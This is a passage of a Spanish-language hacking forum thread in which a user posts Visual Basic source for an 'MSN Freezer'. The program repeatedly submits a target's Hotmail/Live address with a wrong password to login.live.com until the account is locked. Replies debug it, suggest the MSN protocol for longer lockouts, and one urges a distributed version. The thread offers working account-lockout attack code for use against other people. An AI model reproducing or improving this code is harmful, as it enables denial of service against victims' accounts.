elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SRC] Msn Freezer Compact [by *PsYkE1*]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [SRC] Msn Freezer Compact [by *PsYkE1*]  (Leído 11,139 veces)
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
[SRC] Msn Freezer Compact [by *PsYkE1*]
« en: 12 Abril 2010, 01:12 am »

Hola amigos, os presento este code de un Msn freezer, pero a diferencia de los demas, ahorra mucho codigo y cumple basicamente la misma funcion, generalmente en menos tiempo, no se si esto ya se le habia ocurrido antes a alguien, pero ahi va... Por cierto, las criticas constructivas son bienvenidas!! ;D

*Utilizo componente:

    -Microsoft Internet Controls

*En el formulario agrego:


    -Un Textbox = Text1
    -Un CommandButton = Command1
    -Un WebBrowser = WB

Código
  1. ' ////////////////////////////////////////////////////////////////
  2. ' // *Autor: *PsYkE1* (miguelin.majo@gmail.com)                 //
  3. ' // *Podeis agrandar o reducir el codigo, siempre y cuando se  //
  4. ' // respete la autoria y se me comuniquen esos cambios.        //
  5. ' // *Agradecimientos a BlackZeroX.                             //
  6. ' // *Visita http://foro.rthacker.net                           //
  7. ' ////////////////////////////////////////////////////////////////
  8.  
  9. Dim Flag As Boolean
  10.  
  11. Private Sub Command1_Click()
  12.    'Dependiendo del Caption del botón realiza una u otra acción
  13.    If Command1.Caption = "Congelar" Then
  14.        'Si el Text1 esta vacio
  15.        If Text1.Text = "" Then
  16.            Flag = False
  17.            MsgBox "Debes introducir una cuenta", vbCritical, "*PsYkE1* Msn Freezer v1.0"
  18.        Else
  19.            Flag = False
  20.            Text1.Enabled = False
  21.            WB.Navigate ("login.live.com") 'Abro la Web para logearse
  22.            Command1.Caption = "Descongelar"
  23.        End If
  24.    Else
  25.        Text1.Enabled = True
  26.        Command1.Caption = "Congelar"
  27.        WB.Navigate ("") 'Salgo de la Web
  28.        MsgBox "La cuenta " & Text1.Text & " ha sido descongelada", vbInformation, "*PsYkE1* Msn Freezer v1.0"
  29.    End If
  30. End Sub
  31.  
  32. Private Sub Form_Load()
  33.    Me.Caption = "*PsYkE1* Msn Freezer v1.0" 'Pongo Title al Form
  34.    Command1.Caption = "Congelar" 'Asigno el Caption al botón
  35.    Flag = True 'Activo el interruptor
  36. End Sub
  37.  
  38. Private Sub WB_DocumentComplete(ByVal pDisp As Object, URL As Variant)
  39.    On Error Resume Next 'Si hay error no lo muestre
  40.    If Flag Then Exit Sub 'Si el interuptor está activado salgo
  41.    With WB
  42.        .Document.All("login").Value = Text1.Text 'Ingreso la cuenta
  43.        .Document.All("passwd").Value = "by*PsYkE1*" 'Pongo una contraseña que no es
  44.        .Document.All("SI").Click 'hago click
  45.    End With
  46.    ' Si encuentro la cadena "demasiadas veces" en el documento del WB...
  47.    If InStr(WB.Document.Body.InnerHtml, "demasiadas veces") Then
  48.        MsgBox "La cuenta : " & Text1.Text & " ha sido bloqueada con éxito!" _
  49.        , vbInformation, "*PsYkE1* Msn Freezer v1.0": Flag = True
  50.    End If
  51. End Sub

Espero que os haya gustado :)


« Última modificación: 25 Junio 2010, 12:24 pm por *PsYkE1* » En línea

L4sk0!

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: [Source] Msn Freezer Compact
« Respuesta #1 en: 13 Abril 2010, 01:03 am »

E exado un vistazo al code y he de decir q esta bastante bien, no es tan profesional como si utilizas el control winsock, pero he de admitir q le has hechado imaginacion...
Lo he compilado y tarda un poco mas de lo que dices, pero insisto en q no esta nada mal, minimalista, me gusta... ;-)

salu2


En línea

benchy

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Source] Msn Freezer Compact
« Respuesta #2 en: 14 Junio 2010, 14:49 pm »

Hola, lo pase a C#.net porque no entiendo mucho de visual basic y lo estuve probando pero no funciona como los otros Msn Freezer, por lo que veo el evento DocumentComplete se dispara hasta que se bloquea el correo hasta ahi todo bien pero despues de eso no hace nada mas el programa y al rato se desbloquea solo el correo, los otros msn freezer que probe hasta que no cerras el programa no se desbloquea el correo, puede estar dias inclusive, alguien sabe como se programan esos freezer?
Saludos
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [Source] Msn Freezer Compact
« Respuesta #3 en: 14 Junio 2010, 16:26 pm »

Ummm.. Hay un error de sintaxis, no cierras el ultimo If

En ultimo If es del que yo quiero hablar:
Código
  1. If InStr(WB.Document.body.innerhtml, "demasiadas veces") Then

Eso no es en absoluto generico, teniendo en cuenta que entras en login.live.com y es la propia pagina la que determina que idioma te muestra... Deberias comprobarlo de otra forma... no se... tal vez con el HTTP STATUS (404,200...)
En línea

Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [Source] Msn Freezer Compact
« Respuesta #4 en: 14 Junio 2010, 20:13 pm »

Ummm.. Hay un error de sintaxis, no cierras el ultimo If

En ultimo If es del que yo quiero hablar:
Código
  1. If InStr(WB.Document.body.innerhtml, "demasiadas veces") Then

Eso no es en absoluto generico, teniendo en cuenta que entras en login.live.com y es la propia pagina la que determina que idioma te muestra... Deberias comprobarlo de otra forma... no se... tal vez con el HTTP STATUS (404,200...)
Si, es verdad, ya esta corregido... :P Me informare de lo segundo para mejorarlo...
Gracias ;)
Hola, lo pase a C#.net porque no entiendo mucho de visual basic y lo estuve probando pero no funciona como los otros Msn Freezer, por lo que veo el evento DocumentComplete se dispara hasta que se bloquea el correo hasta ahi todo bien pero despues de eso no hace nada mas el programa y al rato se desbloquea solo el correo, los otros msn freezer que probe hasta que no cerras el programa no se desbloquea el correo, puede estar dias inclusive, alguien sabe como se programan esos freezer?
Saludos
Investiga sobre el control Winsock y mirate el MSNP(Messenger Protocol), no creo que esta sea la forma idónea de hacerlo, solo busque hacerlo de una forma diferente, y mas sencilla... :silbar:
No sabia que el mio era por tiempo limitado... Lo he testeado horas y creo recordar que funcionaba... :-\

Salu2! :)
« Última modificación: 14 Junio 2010, 20:20 pm por *PsYkE1* » En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: [SRC] Msn Freezer Compact [by *PsYkE1*]
« Respuesta #5 en: 20 Junio 2010, 23:14 pm »

Buenisimas tus aplicaciones enserio aunque como dicen winsock y MSNP te verian de maravillas
En línea

Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [SRC] Msn Freezer Compact [by *PsYkE1*]
« Respuesta #6 en: 21 Junio 2010, 00:20 am »

Solo trato de dar soluciones diferentes!
Me alegra que te guste!

Salu2!
En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: [SRC] Msn Freezer Compact [by *PsYkE1*]
« Respuesta #7 en: 21 Junio 2010, 21:45 pm »

Bueno la verdad si lo tienes muy facil lo haces las cosas yo me complico mucho al programar, como el programa que hice de firmas digitales
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [SRC] Msn Freezer Compact [by *PsYkE1*]
« Respuesta #8 en: 21 Junio 2010, 22:21 pm »

Pero esto no provocaria un DOS al servidor web? Bueno al menos haria saltar las alarmas no?
Ve un paso mas lejos y hazlo para que se pueda hacer de manera distribuida.

^^

Saludos
En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: [SRC] Msn Freezer Compact [by *PsYkE1*]
« Respuesta #9 en: 21 Junio 2010, 22:38 pm »

 :huh: :huh: :huh:
Bueno eso va segun como lo hagas no creo? ademas hice la prueba y no pasa nada a menos que hagas algo mas grande si
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
QR code en compact framework 3.5?
.NET (C#, VB.NET, ASP)
Zeroql 0 1,884 Último mensaje 24 Abril 2012, 15:13 pm
por Zeroql
Compact Keyboard K300
Hardware
Zorronde 7 3,173 Último mensaje 27 Mayo 2017, 04:52 am
por Zorronde
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines